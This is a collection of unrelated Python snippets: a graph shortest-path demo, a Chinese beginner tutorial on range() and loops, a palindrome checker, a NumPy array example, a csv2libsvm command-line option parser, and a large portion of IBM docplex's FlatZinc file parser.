        at = end
        while at is not None:
            path.append(at)
            at = previous[at]
        return list(reversed(path))
# Demo: build a small 3-node graph, dump its edge table, and print the
# shortest 0 -> 2 path.
g = Graph(3)
g.add_edge(0, 1, 1)
g.add_edge(0, 2, 2)
g.add_edge(1, 2, 3)
g.printer()
print(g.find_shortest_path(0, 2))
|
"""
============================
Author:柠檬班-木森
Time:2020/1/6 21:30
E-mail:3247119728@qq.com
Company:湖南零檬信息技术有限公司
============================
"""
"""
需求:1、计算1+2+3+4+。。。。100的结果
内置函数range:
range(n):默认生成一个 0到n-1的整数序列,对于这个整数序列,我们可以通过list()函数转化为列表类型的数据。
range(n,m):默认生成一个n到m-1的整数序列,对于这个整数序列,我们可以通过list()函数转化为列表类型的数据。
range(n,m,k):相当于其他函数里面的for循环。n 初始值 m 结束值 , k 步长,会生成初始值为n,结束值为m-1,递减或者是递增的整数序列。
range返回的数据是支持使用for进行遍历的,也能够进行下标取值 和切片(切片返回的还是range类型的数据)
"""
# print(list(range(10)))
# r = range(1,101)
# print(r[:10])
# print(list(r))
# print(list(range(1,101,5)))
# while循环实现
# i = 1
# s = 0
# while i <= 100:
# s = s + i
# i += 1
#
# print(s)
# s = 0
# for i in range(1, 101):
# s = s +i
# print(s)
"""
需求二:使用for打印100遍hello python
需求三:打印到第50遍之后 后面的不再打印
for循环也支持使用break,continue
"""
# Requirement 2: print "hello python" 100 times.
# Requirement 3: stop printing after the 50th time.
for i in range(100):
    print("这是第{}遍打印:hello python".format(i + 1))
    if i + 1 == 50:
        # BUG FIX: the original used `continue`, which is a no-op as the last
        # statement of the loop body, so all 100 lines were printed.  `break`
        # implements the stated requirement of stopping after pass 50.
        break
print("------------------------end:{}------------------------".format(i+1))
|
# Given a string, determine if it is a palindrome, considering only
# alphanumeric characters and ignoring cases.
#
# Return 0 / 1 ( 0 for false, 1 for true ) for this problem.
# import string
# def isPalindrome(s):
# s = s.lower() #ignoring case
# # s = s.translate(None, string.punctuation)
# s.translate(str.maketrans('', '', string.punctuation))
# s = s.replace(" ", "")
# return s == s[::-1]
#
class Solution:
    # @param A : string
    # @return an integer
    @staticmethod
    def isPalindrome(A):
        """Return 1 if A is a palindrome considering only alphanumeric
        characters and ignoring case, else 0.

        BUG FIX: the original method took the string as its first (and only)
        parameter with no `self`, so `Solution().isPalindrome(s)` passed the
        instance as A and failed. `@staticmethod` makes both
        `Solution.isPalindrome(s)` and `Solution().isPalindrome(s)` work.
        """
        s = A.lower()  # ignore case
        # Keep only alphanumeric characters (this also drops spaces).
        cleaned = "".join(ch for ch in s if ch.isalnum())
        return int(cleaned == cleaned[::-1])
# BUG FIX: `isPalindrome` is an attribute of Solution, so a bare
# `isPalindrome(...)` at module level raises NameError; qualify the call.
print(
    Solution.isPalindrome("1a2")
)
|
import numpy as np

# Two plain Python lists stacked into one 2-D NumPy array.
my_list1 = [1, 2, 3, 4]
my_list2 = [5, 6, 7, 8]
my_array = np.array([my_list1, my_list2])

# Inspection helpers (left disabled):
# print(my_array)         # the 2x4 array itself
# print(my_array.shape)   # -> (2, 4)
# print(my_array.dtype)   # dtype of the array's members
# Other constructors worth knowing: np.zeros, np.ones, np.empty, np.eye, np.arange
# new_array1 = np.zeros(5)
# new_array1 = np.eye(5)

# Values from 5 (inclusive) up to 50 (exclusive) in steps of 3.
new_array1 = np.arange(5, 50, 3)
print(new_array1)
|
from csv2libsvm import csv2libsvm
from optparse import OptionParser, OptionValueError, Option
import copy
import json
def check_csv_str(option, opt, value):
    """optparse type checker turning 'a,b,c' into ['a', 'b', 'c'].

    NOTE(review): str.split never raises ValueError for a string input,
    so the except branch looks unreachable — confirm intent.
    """
    try:
        parts = value.split(",")
    except ValueError:
        raise OptionValueError(
            "option %s: invalid csv list value: %s" % (opt, value))
    return parts
def check_json(option, opt, value):
    """optparse type checker parsing the option value as a JSON document."""
    try:
        parsed = json.loads(value)
    except ValueError:
        raise OptionValueError(
            "option %s: invalid json value: %s" % (opt, value))
    return parsed
class MyOption(Option):
    """Option subclass registering the custom 'csvlist' and 'json' types."""

    TYPES = Option.TYPES + ("csvlist", "json")
    # A fresh dict so the base class checker table is left untouched.
    TYPE_CHECKER = dict(Option.TYPE_CHECKER,
                        csvlist=check_csv_str,
                        json=check_json)
# Command-line definition for the csv2libsvm converter; MyOption provides
# the custom "csvlist" and "json" option types used below.
parser = OptionParser(option_class=MyOption)  # type: ignore
parser.add_option("-i", "--infile", dest="infile", help="input file name")
parser.add_option(
    "-o", "--outpath", dest="outpath", help="path to directory for output"
)
parser.add_option(
    "-t", "--target", dest="target", help="string name of target variable"
)
parser.add_option(
    "-w", "--weight", dest="weight", help="string name of weight variable"
)
parser.add_option(
    "-z", "--split", dest="split", help="string name of variable with dev/val, etc..."
)
parser.add_option(
    "-p",
    "--probs",
    # BUG FIX: dest was "split", which made -p/--probs silently overwrite the
    # value parsed for -z/--split. Give the option its own destination.
    dest="probs",
    type="json",
    help="json object of probs to create multiple output files",
)
parser.add_option(
    "-f",
    "--factors",
    type="csvlist",
    dest="factors",
    default=[],
    help="csv list of strings indicating factor columns",
)
parser.add_option(
    "-s",
    "--skip",
    type="csvlist",
    dest="skip",
    default=[],
    help="csv list of string names to skip",
)
parser.add_option(
    "-k",
    "--keep",
    type="csvlist",
    dest="keep",
    default=[],
    help="csv list of string names to keep",
)
parser.add_option(
    "-n",
    "--na_strings",
    type="csvlist",
    dest="na_strings",
    default=[""],
    help="csv list of strings representing NULL values",
)
parser.add_option(
    "-N",
    "--nrows",
    type="int",
    dest="nrows",
    help="number of input file rows to process",
)
parser.add_option(
    "-m", "--meta", dest="meta", help="path to saved meta.json file from previous run"
)
def main():
    """Entry point: parse command-line options and run the conversion."""
    options, _args = parser.parse_args()
    # Forward the parsed option values to csv2libsvm by name.
    fields = ("infile", "outpath", "target", "weight", "split",
              "factors", "skip", "keep", "na_strings", "nrows", "meta")
    csv2libsvm(**{name: getattr(options, name) for name in fields})
|
# --------------------------------------------------------------------------
# Source file provided under Apache License, Version 2.0, January 2004,
# http://www.apache.org/licenses/
# (c) Copyright IBM Corp. 2017, 2018
# --------------------------------------------------------------------------
# Author: Olivier OUDOT, IBM Analytics, France Lab, Sophia-Antipolis
"""
Parser converting a FZN file to internal model representation.
This parser does not support the complete set of predicates described in the specifications of FlatZinc
that can be found here: http://www.minizinc.org/downloads/doc-1.6/flatzinc-spec.pdf
Basically, it supports essentially integer expressions, some floating point expressions and custom
predicates related to scheduling.
The predicates that are supported are:
* *array predicates*
array_bool_and, array_bool_element, array_bool_or, array_bool_xor,
array_float_element, array_int_element, array_set_element,
array_var_bool_element, array_var_float_element, array_var_int_element, array_var_set_element.
* *boolean predicates*
bool2int, bool_and, bool_clause, bool_eq, bool_eq_reif, bool_le, bool_le_reif,
bool_lin_eq, bool_lin_le, bool_lt, bool_lt_reif, bool_not, bool_or, bool_xor.
* *integer predicates*
int_abs, int_div, int_eq, int_eq_reif, int_le, int_le_reif, int_lin_eq, int_lin_eq_reif,
int_lin_le, int_lin_le_reif, int_lin_ne, int_lin_ne_reif, int_lt, int_lt_reif, int_max, int_min,
int_mod, int_ne, int_ne_reif, int_plus, int_times, int2float.
* *float predicates*
float_abs, float_exp, float_ln, float_log10, float_log2, float_sqrt, float_eq, float_eq_reif,
float_le, float_le_reif, float_lin_eq, float_lin_eq_reif, float_lin_le, float_lin_le_reif, float_lin_lt,
float_lin_lt_reif, float_lin_ne, float_lin_ne_reif, float_lt, float_lt_reif, float_max, float_min,
float_ne, float_ne_reif, float_plus.
* *set predicates*
set_in, set_in_reif.
* *custom predicates*
all_different_int, subcircuit, count_eq_const, table_int, inverse,
lex_lesseq_bool, lex_less_bool, lex_lesseq_int, lex_less_int, int_pow, cumulative
Detailed description
--------------------
"""
from docplex.cp.fzn.fzn_tokenizer import *
from docplex.cp.expression import *
from docplex.cp.solution import *
from docplex.cp.model import CpoModel
import docplex.cp.modeler as modeler
import docplex.cp.config as config
import docplex.cp.expression as expression
import collections
from docplex.cp.utils import xrange, is_int_value
import traceback
###############################################################################
## Constants
###############################################################################
###############################################################################
## Public classes
###############################################################################
class FznParserException(CpoException):
    """ Base class for all exceptions raised by the FZN parser.
    """
    def __init__(self, msg):
        """ Create a new parser exception
        Args:
            msg: Error message
        """
        super(FznParserException, self).__init__(msg)
# Parameter descriptor
# NOTE(review): this namedtuple is immediately shadowed by the FznParameter
# class declared a few lines below, so it is effectively dead code — confirm
# whether it can be removed.
FznParameter = collections.namedtuple('FznParameter', ('name',   # Variable name
                                                       'type',   # Variable type (string)
                                                       'size',   # Array size (if array), None for single value
                                                       'value',  # Value
                                                       ))
class FznObject(object):
    """ Base descriptor for every object read from a FZN file.
    """
    # No attributes of its own; empty slots keep subclasses __dict__-free.
    __slots__ = ()
class FznParameter(FznObject):
    """ Descriptor of a FZN parameter
    """
    __slots__ = ('name',   # Parameter name
                 'type',   # Parameter type
                 'size',   # Array size (if array), None for variable
                 'value',  # Initial value (if any)
                 )

    def __init__(self, name, type, size, value):
        """ Create a new FZN parameter
        Args:
            name:  Name of the parameter
            type:  Type of the parameter
            size:  Array size, None if not array
            value: Parameter value
        """
        self.name = name
        self.type = type
        self.size = size
        self.value = value

    def __str__(self):
        # Array parameters show their size and the bracketed element list;
        # scalar parameters just show the value.
        if self.size:
            return "{}(type={}, size={}, value=[{}])".format(
                self.name, self.type, self.size,
                ', '.join(str(x) for x in self.value))
        return "{}(type={}, value={})".format(self.name, self.type, self.value)
class FznVariable(FznObject):
    """ Descriptor of a FZN variable
    """
    __slots__ = ('name',         # Variable name
                 'type',         # Variable type (String)
                 'domain',       # Domain
                 'size',         # Array size (if array), None for variable
                 'value',        # Initial value (if any)
                 'annotations',  # Dictionary of annotations
                 # Attributes needed for model reduction
                 'ref_vars',     # Tuple of variables referenced by this variable
                 )

    def __init__(self, name, type, domain, annotations, size, value):
        """ Create a new FZN variable
        Args:
            name:        Name of the variable
            type:        Variable type
            domain:      Variable domain
            annotations: Declaration annotations (dictionary)
            size:        Array size, None if not array
            value:       Initial value, None if none
        """
        # NOTE: the 'ref_vars' slot is intentionally left unset here;
        # it is filled in later by the model-reduction pass.
        self.name = name
        self.type = type
        self.domain = domain
        self.annotations = annotations
        self.size = size
        self.value = value

    def is_defined(self):
        """ Check if the variable is defined (by a constraint)
        Return:
            True if variable is defined, False otherwise
        """
        return 'is_defined_var' in self.annotations

    def is_introduced(self):
        """ Check if the variable is introduced
        Return:
            True if variable is introduced, False otherwise
        """
        return 'var_is_introduced' in self.annotations

    def is_output(self):
        """ Check if the variable is an output of the model
        Return:
            True if variable is an output variable or array, False otherwise
        """
        return ('output_var' in self.annotations) or ('output_array' in self.annotations)

    def _get_domain_bounds(self):
        """ Get the variable domain bounds
        Return:
            Tuple (dmin, dmax) of the domain bounds
        """
        # Domain elements are either single values or (min, max) interval tuples.
        dmin = self.domain[0]
        dmin = dmin[0] if isinstance(dmin, tuple) else dmin
        dmax = self.domain[-1]
        dmax = dmax[-1] if isinstance(dmax, tuple) else dmax
        return (dmin, dmax)

    def __str__(self):
        lstr = [self.name, "(type=", self.type, ", dom=", str(self.domain)]
        if self.is_defined():
            lstr.append(", defined")
        if self.is_introduced():
            lstr.append(", introduced")
        if self.size:
            if self.value:
                lstr.append(', value=[')
                for i, x in enumerate(self.value):
                    if i > 0:
                        lstr.append(', ')
                    # Array element may be an array access (var, index),
                    # a variable, or a plain constant.
                    if isinstance(x, tuple) and isinstance(x[0], FznVariable):
                        lstr.append("{}[{}]".format(x[0].name, x[1]))
                    elif isinstance(x, FznVariable):
                        lstr.append(x.name)
                    else:
                        lstr.append(str(x))
                lstr.append(']')
            else:
                lstr.append(", size={}".format(self.size))
        elif self.value:
            lstr.append(", value={}".format(self.value))
        lstr.append(')')
        return ''.join(lstr)
class FznConstraint(FznObject):
    """ Descriptor of a FZN constraint
    """
    __slots__ = ('predicate',  # Name of the predicate
                 'args',       # Arguments
                 'defvar',     # Name of the variable defined by this constraint
                 # Attributes needed for model reduction
                 'ref_vars',   # Tuple of variables referenced by this constraint, but not defined
                 )

    def __init__(self, predicate, args, annotations):
        """ Create a new FZN constraint
        Args:
            predicate:   Name of the predicate
            args:        List of arguments
            annotations: Declaration annotations
        """
        self.predicate = predicate
        self.args = args
        # Variable defined by this constraint, taken from the 'defines_var'
        # annotation; None when the annotation is absent.
        self.defvar = annotations.get('defines_var', (None,))[0]
        self.ref_vars = ()

    def _ref_vars_iterator(self):
        """ Iterator on the variables that are referenced in the arguments of this constraint.
        Returns:
            Iterator on all variables referenced by this constraint
        """
        # Arguments may be arrays of values/variables or scalar values.
        for a in self.args:
            if is_array(a):
                for v in a:
                    if isinstance(v, FznVariable):
                        yield v
            elif isinstance(a, FznVariable):
                yield a

    def __str__(self):
        lstr = [self.predicate, "("]
        for i, x in enumerate(self.args):
            if i > 0:
                lstr.append(', ')
            # Argument may be an array access (var, index), a named object,
            # a list, or a plain constant.
            if isinstance(x, tuple) and isinstance(x[0], FznVariable):
                lstr.append("{}[{}]".format(x[0].name, x[1]))
            elif isinstance(x, (FznVariable, FznParameter)):
                lstr.append(x.name)
            elif isinstance(x, list):
                lstr.append("[{}]".format(', '.join(str(v) for v in x)))
            else:
                lstr.append(str(x))
        lstr.append(')')
        if self.defvar:
            lstr.append(":")
            lstr.append(self.defvar.name)
        return ''.join(lstr)
class FznObjective(FznObject):
    """ Descriptor of a FZN solve objective
    """
    __slots__ = ('operation',    # Objective operation in 'satisfy', 'minimize', 'maximize'
                 'expr',         # Target expression
                 'annotations',  # Annotations
                 )

    def __init__(self, operation, expr, annotations):
        """ Create a new FZN objective
        Args:
            operation:   Objective operation in 'satisfy', 'minimize', 'maximize'
            expr:        Target expression
            annotations: Annotations
        """
        self.operation = operation
        self.expr = expr
        self.annotations = annotations

    def __str__(self):
        return "%s %s (%s)" % (self.operation, self.expr, self.annotations)
class FznReader(object):
    """ Reader of FZN file format.

    Reads a FlatZinc document and builds lists of parameter, variable,
    constraint and objective descriptors (no CPO compilation here).
    """
    __slots__ = ('source_file',  # Source file
                 'tokenizer',    # Reading tokenizer
                 'token',        # Last read token
                 'var_map',      # Dictionary of variables.
                                 # Key is variable name, value is variable descriptor
                 'parameters',   # List of parameters
                 'variables',    # List of variables
                 'constraints',  # List of model constraints
                 'objective',    # Model objective
                 )

    def __init__(self, mdl=None):
        """ Create a new FZN reader
        Args:
            mdl: Unused, kept for interface compatibility.
        """
        super(FznReader, self).__init__()
        self.source_file = None
        self.tokenizer = None
        self.token = None
        self.var_map = {}
        self.parameters = []
        self.variables = []
        self.constraints = []
        self.objective = None

    def parse(self, cfile):
        """ Parse a FZN file
        Args:
            cfile: FZN file to read
        Raises:
            FznParserException: Parsing exception
        """
        # Store file name if first file
        self.source_file = cfile
        self.tokenizer = FznTokenizer(file=cfile)
        self._read_document()
        self.tokenizer = None

    def parse_string(self, str):
        """ Parse a string
        Result of the parsing is added to the current result model.
        Args:
            str: String to parse
        """
        self.tokenizer = FznTokenizer(input=str)
        self._read_document()
        self.tokenizer = None

    def write(self, out=None):
        """ Write the model.
        If the given output is a string, it is considered as a file name that is opened by this method
        using 'utf-8' encoding.
        Args:
            out (Optional): Target output stream or file name. If not given, default value is sys.stdout.
        """
        # Check file
        if is_string(out):
            with open_utf8(os.path.abspath(out), mode='w') as f:
                self.write(f)
            return
        # Check default output
        if out is None:
            out = sys.stdout
        # Write model content
        # BUG FIX: content was emitted with print() and therefore always went
        # to sys.stdout, ignoring the 'out' argument. Write to 'out' instead.
        for x in self.parameters:
            out.write(str(x) + '\n')
        for x in self.variables:
            out.write(str(x) + '\n')
        for x in self.constraints:
            out.write(str(x) + '\n')
        out.flush()

    def _read_document(self):
        """ Read all FZN document
        """
        try:
            self._next_token()
            # FZN layout: predicates, then declarations, then constraints,
            # then the solve item.
            while self._read_predicate():
                pass
            while self._read_parameter_or_variable():
                pass
            while self._read_constraint():
                pass
            self._read_objective()
        except Exception as e:
            if isinstance(e, FznParserException):
                raise e
            if config.context.log_exceptions:
                traceback.print_exc()
            self._raise_exception(str(e))
        if self.token is not TOKEN_EOF:
            self._raise_exception("Unexpected token '{}'".format(self.token))

    def _read_predicate(self):
        """ Read a predicate declaration
        This function is called with first token already read and terminates with next token already read.
        Returns:
            True if a predicate has been read, False if nothing to process
        """
        if self.token is not TOKEN_KEYWORD_PREDICATE:
            return False
        # Read (and skip) predicate declaration; predicates are not interpreted.
        while self.token not in (TOKEN_SEMICOLON, TOKEN_EOF):
            self._next_token()
        if self.token is not TOKEN_SEMICOLON:
            self._raise_exception("Semicolon ';' expected at the end of a predicate declaration.")
        self._next_token()
        return True

    def _read_parameter_or_variable(self):
        """ Read a parameter or variable declaration
        This function is called with first token already read and terminates with next token already read.
        Returns:
            True if a parameter has been read, False if nothing to process
        """
        tok = self.token
        if tok.type is not TOKEN_TYPE_KEYWORD:
            return False
        # Read array size if any
        arsize = self._read_array_size()
        # Check if variable declaration
        tok = self.token
        if tok is TOKEN_KEYWORD_VAR:
            self._next_token()
            return self._read_variable(arsize)
        # Check type name
        if tok not in (TOKEN_KEYWORD_BOOL, TOKEN_KEYWORD_FLOAT, TOKEN_KEYWORD_INT, TOKEN_KEYWORD_SET):
            return False
        typ = tok
        if typ is TOKEN_KEYWORD_SET:
            self._check_token(self._next_token(), TOKEN_KEYWORD_OF)
            self._check_token(self._next_token(), TOKEN_KEYWORD_INT)
        # Check separating colon
        self._check_token(self._next_token(), TOKEN_COLON)
        # Check parameter name
        tok = self._next_token()
        if tok.type is not TOKEN_TYPE_SYMBOL:
            self._raise_exception("Symbol expected as parameter name.")
        pid = tok.value
        self._check_token(self._next_token(), TOKEN_ASSIGN)
        # Read expression
        self._next_token()
        expr = self._read_expression()
        if arsize:
            expr = list(expression._domain_iterator(expr))
            if typ is TOKEN_KEYWORD_SET:
                arsize = len(expr)
        self._check_token(self.token, TOKEN_SEMICOLON)
        self._next_token()
        # Build result
        fp = FznParameter(pid, typ.value, arsize, expr)
        self.var_map[pid] = fp
        self.parameters.append(fp)
        return True

    def _read_variable(self, arsize):
        """ Read a variable declaration
        This function is called with first token already read and terminates with next token already read.
        Args:
            arsize: Array size if any
        Returns:
            True if a variable has been read, False if nothing to process
        """
        # Read type and domain
        typ, dom = self._read_var_domain()
        self._check_token(self.token, TOKEN_COLON)
        tok = self._next_token()
        if tok.type is not TOKEN_TYPE_SYMBOL:
            self._raise_exception("Symbol expected as variable name.")
        vid = tok.value
        tok = self._next_token()
        # Check annotations
        annotations = self._read_annotations()
        # print("Annotations: {}".format(annotations))
        # Check expression
        expr = None
        if self.token is TOKEN_ASSIGN:
            self._next_token()
            expr = self._read_expression()
        # Read ending semicolon
        self._check_token(self.token, TOKEN_SEMICOLON)
        self._next_token()
        # Create variable
        fv = FznVariable(vid, typ.value, dom, annotations, arsize, expr)
        self.var_map[vid] = fv
        self.variables.append(fv)
        return True

    def _read_constraint(self):
        """ Read a constraint
        This function is called with first token already read and terminates with next token already read.
        Returns:
            True if a constraint has been read, False if nothing to process
        """
        # Check constraint token
        if self.token is not TOKEN_KEYWORD_CONSTRAINT:
            return False
        # Read constraint name
        tok = self._next_token()
        if tok.type is not TOKEN_TYPE_SYMBOL:
            self._raise_exception("Constraint name '{}' should be a symbol.".format(tok))
        cname = tok.value
        # Read parameters
        args = []
        self._check_token(self._next_token(), TOKEN_PARENT_OPEN)
        self._next_token()
        while self.token is not TOKEN_PARENT_CLOSE:
            args.append(self._read_expression())
            if self.token is TOKEN_COMMA:
                self._next_token()
        self._next_token()
        # Check annotations (FznConstraint extracts 'defines_var' itself)
        annotations = self._read_annotations()
        # Read ending semicolon
        self._check_token(self.token, TOKEN_SEMICOLON)
        self._next_token()
        # Store constraint
        self.constraints.append(FznConstraint(cname, args, annotations))
        return True

    def _read_objective(self):
        """ Read solve objective
        This function is called with first token already read and terminates with next token already read.
        Returns:
            True if the solve objective has been read, False if nothing to process
        """
        # Check solve token
        if self.token is not TOKEN_KEYWORD_SOLVE:
            return False
        self._next_token()
        # Check annotations
        annotations = self._read_annotations()
        # Read solve objective
        tok = self.token
        if (tok not in (TOKEN_KEYWORD_SATISFY, TOKEN_KEYWORD_MINIMIZE, TOKEN_KEYWORD_MAXIMIZE)):
            self._raise_exception(
                "Solve objective '{}' should be a symbol in 'satisfy', 'minimize', 'maximize'.".format(tok))
        obj = tok
        self._next_token()
        # Read expression if any (no expression for 'satisfy')
        expr = None if obj is TOKEN_KEYWORD_SATISFY else self._read_expression()
        # Read ending semicolon
        self._check_token(self.token, TOKEN_SEMICOLON)
        self._next_token()
        # Store objective
        self.objective = FznObjective(obj.value, expr, annotations)
        return True

    def _read_expression(self):
        """ Read an expression
        First expression token is already read.
        Function exits with current token following the last expression token
        Returns:
            Expression that has been read
        """
        tok = self.token
        self._next_token()
        # Check int constant
        if tok.type is TOKEN_TYPE_INTEGER:
            v1 = int(tok.value)
            # Check set const (interval 'v1..v2')
            if self.token is TOKEN_INTERVAL:
                tok2 = self._next_token()
                if tok2.type is not TOKEN_TYPE_INTEGER:
                    self._raise_exception("Set upper bound {} should be an integer constant.".format(tok2))
                self._next_token()
                v2 = int(tok2.value)
                return (v1,) if v1 == v2 else (v1, v2)
            else:
                return v1
        # Check float constant
        if tok.type is TOKEN_TYPE_FLOAT:
            return float(tok.value)
        # Set of integer constant
        if tok is TOKEN_BRACE_OPEN:
            lints = []
            tok = self.token
            while tok is not TOKEN_BRACE_CLOSE:
                if tok.type is not TOKEN_TYPE_INTEGER:
                    self._raise_exception("Set element {} should be an integer constant.".format(tok))
                lints.append(int(tok.value))
                tok = self._next_token()
                if tok is TOKEN_COMMA:
                    tok = self._next_token()
            self._next_token()
            return lints
        # Check symbols
        if tok.type is TOKEN_TYPE_SYMBOL:
            sid = tok.value
            # Check array access
            if self.token is TOKEN_HOOK_OPEN:
                # Access corresponding FZN element
                elem = self.var_map.get(sid)
                if elem is None:
                    self._raise_exception("Unknown symbol '{}'.".format(sid))
                tok2 = self._next_token()
                if tok2.type is not TOKEN_TYPE_INTEGER:
                    self._raise_exception("Array index '{}' should be an integer constant.".format(tok2))
                self._check_token(self._next_token(), TOKEN_HOOK_CLOSE)
                self._next_token()
                # Build array access as a tuple (arr_name, index)
                return (elem, int(tok2.value))
            # Check annotation function call
            elif self.token is TOKEN_PARENT_OPEN:
                lexprs = [sid]
                self._next_token()
                while self.token is not TOKEN_PARENT_CLOSE:
                    lexprs.append(self._read_expression())
                    if self.token is TOKEN_COMMA:
                        self._next_token()
                self._next_token()
                return tuple(lexprs)
            else:
                # Check if corresponds to FZN element
                return self.var_map.get(sid, sid)
        # Array of expressions
        if tok is TOKEN_HOOK_OPEN:
            lexprs = []
            while self.token is not TOKEN_HOOK_CLOSE:
                lexprs.append(self._read_expression())
                if self.token is TOKEN_COMMA:
                    self._next_token()
            self._next_token()
            return lexprs
        # Check boolean constant
        if tok is TOKEN_KEYWORD_TRUE:
            return True
        if tok is TOKEN_KEYWORD_FALSE:
            return False
        # Unknown
        self._raise_exception("Invalid expression start: '{}'.".format(tok))

    def _read_array_size(self):
        """ Read an array size declaration
        First expression token is already read.
        Function exits with current token following the last expression token
        Returns:
            Array size as int if given,
            -1 if size is not precised,
            None if no array specified
        """
        # Check array token
        if self.token is not TOKEN_KEYWORD_ARRAY:
            return None
        # Read array specs
        self._check_token(self._next_token(), TOKEN_HOOK_OPEN)
        tok = self._next_token()
        if tok is TOKEN_KEYWORD_INT:
            arsize = -1
        else:
            # BUG FIX: the condition used 'and', which let any integer lower
            # bound pass unchecked (e.g. 'array [2..5]'). FZN array index sets
            # must start at 1, so reject any token that is not the integer '1'.
            if (tok.type is not TOKEN_TYPE_INTEGER) or tok.value != '1':
                self._raise_exception("Array size should start by '1'")
            self._check_token(self._next_token(), TOKEN_INTERVAL)
            tok = self._next_token()
            if tok.type is not TOKEN_TYPE_INTEGER:
                self._raise_exception("Array size '{}' should be integer.".format(tok))
            arsize = int(tok.value)
        self._check_token(self._next_token(), TOKEN_HOOK_CLOSE)
        self._check_token(self._next_token(), TOKEN_KEYWORD_OF)
        self._next_token()
        return arsize

    def _read_var_domain(self):
        """ Read the domain of a variable.
        First expression token is already read.
        Function exits with current token following the last expression token
        Returns:
            Type token and variable domain
        """
        # Get token
        tok = self.token
        typ = tok
        # Check boolean domain
        if typ is TOKEN_KEYWORD_BOOL:
            self._next_token()
            return typ, BINARY_DOMAIN
        # Check undefined domain
        if typ is TOKEN_KEYWORD_INT:
            self._next_token()
            return typ, DEFAULT_INTEGER_VARIABLE_DOMAIN
        # Read set of integers or interval
        if tok is TOKEN_BRACE_OPEN:
            # Compact the sorted value list into single values and
            # (min, max) tuples for consecutive runs.
            lint = sorted(self._read_expression())
            dom = []
            llen = len(lint)
            i = 0
            while i < llen:
                j = i + 1
                while (j < llen) and (lint[j] == lint[j - 1] + 1):
                    j += 1
                if (j > i + 1):
                    dom.append((lint[i], lint[j - 1]))
                else:
                    dom.append(lint[i])
                i = j
            return TOKEN_KEYWORD_INT, tuple(dom)
        # Check integer domain
        if tok.type is not TOKEN_TYPE_INTEGER:
            self._raise_exception("Variable domain should start by an integer constant.")
        self._next_token()
        if self.token is TOKEN_INTERVAL:
            tok2 = self._next_token()
            if tok2.type is not TOKEN_TYPE_INTEGER:
                self._raise_exception("Domain upper bound {} should be an integer constant.".format(tok2))
            self._next_token()
            v1 = int(tok.value)
            v2 = int(tok2.value)
            if v1 == v2:
                return TOKEN_KEYWORD_INT, (v1,)
            return TOKEN_KEYWORD_INT, ((v1, v2),)
        else:
            return TOKEN_KEYWORD_INT, (int(tok.value),)

    def _read_annotations(self):
        """ Read a list of annotations
        First expression token is already read.
        Function exits with current token following the last expression token
        Returns:
            Dictionary of annotations. Key is name, value is tuple of parameters.
        """
        result = {}
        # Annotations are introduced by '::'
        while self.token is TOKEN_DOUBLECOLON:
            # Read annotation name
            anm = self._next_token()
            if anm.type is not TOKEN_TYPE_SYMBOL:
                self._raise_exception("Annotation name '{}' should be a symbol.".format(anm))
            args = []
            tok = self._next_token()
            if tok is TOKEN_PARENT_OPEN:
                self._next_token()
                while self.token is not TOKEN_PARENT_CLOSE:
                    args.append(self._read_expression())
                    if self.token is TOKEN_COMMA:
                        self._next_token()
                self._next_token()
            result[anm.value] = tuple(args)
        return result

    def _next_token(self):
        """ Read next token
        Returns:
            Next read token, None if end of input
        """
        self.token = self.tokenizer.next_token()
        # print("Line {}, col {}, tok '{}'".format(self.tokenizer.line_number, self.tokenizer.read_index, self.token))
        return self.token

    def _check_token(self, tok, etok):
        """ Check that a read token is a given one and raise an exception if not
        Args:
            tok:  Read token
            etok: Expected token
        """
        if tok is not etok:
            self._raise_exception("Read token '{}' instead of expected '{}'".format(tok, etok))

    def _raise_exception(self, msg):
        """ Raise a Parsing exception
        Args:
            msg: Exception message
        """
        raise FznParserException(self.tokenizer.build_error_string(msg))
class FznParser(object):
""" Reader of FZN file format """
__slots__ = ('model', # Read model
'compiled', # Model compiled indicator
'reader', # FZN reader
'cpo_exprs', # Dictionary of CPO expressions. Key=name, value=CPO expr
'reduce', # Reduce model indicator
'interval_gen', # Name generator for interval var expressions
'cumul_gen', # Name generator for cumul atom expressions
'parameters', # List of parameters
'variables', # List of variables
'constraints', # List of model constraints
'objective', # Model objective
'cur_constraint', # Currently compiled constraint descriptor
'def_var_exprs', # List of expressions waiting for defvars to be defined
'cpo_variables', # Set of names of variables that are translated as real CPO variables
)
def __init__(self, mdl=None):
    """ Create a new FZN format parser
    Args:
        mdl: Model to fill, None (default) to create a new one.
    """
    super(FznParser, self).__init__()
    self.model = CpoModel() if mdl is None else mdl
    self.compiled = False
    self.reader = FznReader()
    self.interval_gen = IdAllocator("IntervalVar_")
    self.cumul_gen = IdAllocator("VarCumulAtom_")
    # Do not store location information (would store parser instead of real lines)
    self.model.source_loc = False
    # Set model reduction indicator
    self.reduce = config.context.parser.fzn_reduce
def get_model(self):
    """ Get the model that has been parsed
    Return:
        CpoModel result of the parsing
    """
    # Compile lazily, on first access only
    if self.compiled:
        return self.model
    self.compiled = True
    self._compile_to_model()
    return self.model
def parse(self, cfile):
    """ Parse a FZN file
    Args:
        cfile: FZN file to read
    Raises:
        FznParserException: Parsing exception
    """
    # Remember the first parsed file as the model source file
    if self.model.source_file is None:
        self.model.source_file = cfile
    self.reader.parse(cfile)
def parse_string(self, str):
    """ Parse a string
    Result of the parsing is added to the current result model.
    Args:
        str: String to parse
    """
    # Delegate to the FZN reader; compilation happens later in get_model()
    self.reader.parse_string(str)
def get_output_variables(self):
    """ Get the list of model output variables
    Returns:
        List of output variables, in declaration order.
    """
    result = []
    for v in self.variables:
        if v.is_output():
            result.append(v)
    return result
def _write_model(self, out=None):
    """ Print read model (short version)
    Args:
        out (optional): Output stream. Default is stdout
    """
    stream = sys.stdout if out is None else out
    stream.write(self.get_model().get_cpo_string(short_output=True))
    stream.write("\n")
def _get_cpo_expr_map(self):
    """ For testing, get the map of CPO expressions
    Returns:
        Dictionary of compiled CPO expressions, keyed by FZN name.
    """
    # Force compilation so the expression map is populated
    self.get_model()
    return self.cpo_exprs
def _compile_to_model(self):
    """ Compile FZN model into CPO model
    """
    # Initialize processing
    self.cpo_exprs = {}
    self.parameters = self.reader.parameters
    self.variables = self.reader.variables
    self.constraints = self.reader.constraints
    self.objective = self.reader.objective
    self.def_var_exprs = {}
    self.cpo_variables = set()
    # Reduce model if required
    if self.reduce:
        self._reduce_model()
    # print("=== Variables:")
    # for v in self.variables:
    #     print("   : {}".format(v))
    # print("=== Constraints:")
    # for c in self.constraints:
    #     print("   : {}".format(c))
    # sys.stdout.flush()
    # Compile parameters
    for x in self.parameters:
        self._compile_parameter(x)
